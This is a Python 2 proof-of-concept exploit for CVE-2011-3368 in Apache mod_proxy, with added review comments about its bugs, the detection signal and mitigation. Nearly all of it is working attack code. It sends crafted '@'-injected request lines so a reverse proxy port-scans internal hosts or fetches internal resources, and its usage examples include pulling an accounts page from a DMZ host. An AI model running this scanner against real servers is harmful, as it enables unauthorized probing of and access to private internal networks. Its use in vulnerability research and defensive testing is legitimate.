#!/usr/bin/env python
# NOTE(review): Python 2 only -- `print` statements, `string.find`, and a
# `str` written straight to a socket.  This will not run under Python 3.
#
# Proof of concept for CVE-2011-3368 (Apache HTTP Server mod_proxy reverse
# proxy request-URI handling).  Every probe is a single request of the form
#
#     GET <url>@<internal_target>:<internal_port>/<resource> HTTP/1.1
#     Host: <apache_target>
#
# i.e. an "@" placed directly after the proxied path.  From a defender's
# side that request-line shape is the detection signal (access logs, WAF
# rules); the mitigation is an Apache release that addresses CVE-2011-3368
# and, as commonly advised for this issue, reverse-proxy RewriteRule/
# ProxyPass patterns that only match request paths beginning with "/".
import socket
import string
import getopt, sys

# Default probe list when no -e port is given.  Mixed with a str from -e
# later, so scan_host() normalises each entry with str().
known_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]


def send_request(url, apache_target, apache_port, internal_target, internal_port, resource):
    """Send one crafted GET to the Apache host and return the raw reply.

    All arguments are strings; internal_port is concatenated into the
    request line, not converted.  Returns at most 4096 bytes of the
    response, or "" on any failure.
    """
    # Request-target <url>@<host>:<port>/<resource>; Host names the proxy.
    get = "GET " + url + "@" + internal_target + ":" + internal_port + "/" + resource + " HTTP/1.1\r\n"
    get = get + "Host: " + apache_target + "\r\n\r\n"
    remoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    remoteserver.settimeout(3)  # 3 s applies to connect, send and recv
    try:
        remoteserver.connect((apache_target, int(apache_port)))
        # NOTE(review): send() may transmit fewer bytes than len(get);
        # sendall() would be the safe call.  recv(4096) returns only the
        # first chunk, so a long reply reaches get_banner() truncated.
        remoteserver.send(get)
        return remoteserver.recv(4096)
    except:
        # NOTE(review): bare except -- covers socket.timeout / connection
        # refused (the intended case) but also ValueError from
        # int(apache_port) and KeyboardInterrupt, so a non-numeric -p is
        # reported as "Filtered" on every port.  The socket is never
        # explicitly closed on either path.
        return ""


def get_banner(result):
    """Return the body of a raw HTTP reply: everything after the first blank line.

    If result holds no "\r\n\r\n", string.find() gives -1 and the slice
    starts at index 3, so the caller sees the headers minus their first
    three characters rather than an empty string.
    """
    return result[string.find(result, "\r\n\r\n")+4:]


def scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):
    """Probe each entry of tested_ports through the proxy and print a verdict.

    The verdict is a heuristic on the proxied reply's status line only:
      "HTTP/1.1 200", "HTTP/1.1 30x" or "HTTP/1.1 502" -> Open (body printed)
      empty reply (timeout/connect failure in send_request) -> Filtered
      anything else -> Closed
    NOTE(review): 502 is counted as Open -- the author appears to treat it
    as the proxy having reached the internal port but not getting HTTP
    back; the code cannot tell that apart from other 502 causes, so
    expect false positives.
    """
    print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)
    for port in tested_ports:
        port = str(port)  # known_ports holds ints, -e gives a str
        result = send_request(url, apache_target, apache_port, internal_target, port, resource)
        if string.find(result,"HTTP/1.1 200")!=-1 or \
           string.find(result,"HTTP/1.1 30")!=-1 or \
           string.find(result,"HTTP/1.1 502")!=-1:
            print "- Open port: " + port + "/TCP"
            print get_banner(result)
        elif len(result)==0: print "- Filtered port: " + port + "/TCP"
        else: print "- Closed port: " + port + "/TCP"


def usage():
    """Print the help text and examples to stdout (callers then exit 2)."""
    print
    print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
    print "http://www.secforce.co.uk"
    print
    print "usage():"
    print "python apache_scan.py [options]"
    print
    print " [options]"
    print "-r: Remote Apache host"
    print "-p: Remote Apache port (default is 80)"
    print "-u: URL on the remote web server (default is /)"
    print "-d: Host in the DMZ (default is 127.0.0.1)"
    print "-e: Port in the DMZ (enables 'single port scan')"
    print "-g: GET request to the host in the DMZ (default is /)"
    print "-h: Help page"
    print
    print "examples:"
    print " - Port scan of the remote host"
    print "python apache_scan.py -r www.example.com -u /images/test.gif"
    print " - Port scan of a host in the DMZ"
    print "python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local"
    print " - Retrieve a resource from a host in the DMZ"
    print "python apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html"
    print


def print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):
    """Print the run parameters.

    apache_target, apache_port, internal_target and resource are
    concatenated, so they must be str (they are: defaults and getopt values
    are strings); tested_ports may hold ints or strs.  url is accepted but
    not printed.
    """
    print
    print "CVE-2011-3368 proof of concept by Rodrigo Marcos"
    print "http://www.secforce.co.uk"
    print
    print " [+] Target: " + apache_target
    print " [+] Target port: " + apache_port
    print " [+] Internal host: " + internal_target
    print " [+] Tested ports: " + str(tested_ports)
    print " [+] Internal resource: " + resource
    print


def main():
    """Parse sys.argv into the module-level settings.

    Rebinds url, apache_target, apache_port, internal_target, internal_port
    and resource via `global`; the defaults come from the module-level
    assignments that run before main() is called.  Exits with status 2 on
    -h/--help, on an unknown option, or when -r was not supplied
    (apache_target still "").  Option values are stored verbatim: -p is only
    converted with int() inside send_request(), -e stays a str.
    """
    global apache_target
    global apache_port
    global url
    global internal_target
    global internal_port
    global resource
    try:
        opts, args = getopt.getopt(sys.argv[1:], "u:r:p:d:e:g:h", ["help"])  # args (positionals) is unused
    except getopt.GetoptError:
        usage()
        sys.exit(2)
    # NOTE(review): getopt has already parsed everything above, so this
    # second GetoptError handler cannot fire; the loop only assigns.  A
    # repeated option silently overrides the earlier value.
    try:
        for o, a in opts:
            if o in ("-h", "--help"):
                usage()
                sys.exit(2)
            if o == "-u":
                url=a
            if o == "-r":
                apache_target=a
            if o == "-p":
                apache_port=a
            if o == "-d":
                internal_target = a
            if o == "-e":
                internal_port=a
            if o == "-g":
                resource=a
    except getopt.GetoptError:
        usage()
        sys.exit(2)
    if apache_target == "":
        usage()
        sys.exit(2)


# Module-level defaults; main() rebinds them through `global`.
url = "/"
apache_target = ""
apache_port = "80"
internal_target = "127.0.0.1"
internal_port = ""
resource = "/"

main()

# -e selects a single port (kept as the str main() stored); otherwise the
# built-in list is used.  Note known_ports[0] is port 0 and is sent as-is.
if internal_port!="":
    tested_ports = [internal_port]
else:
    tested_ports = known_ports

scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)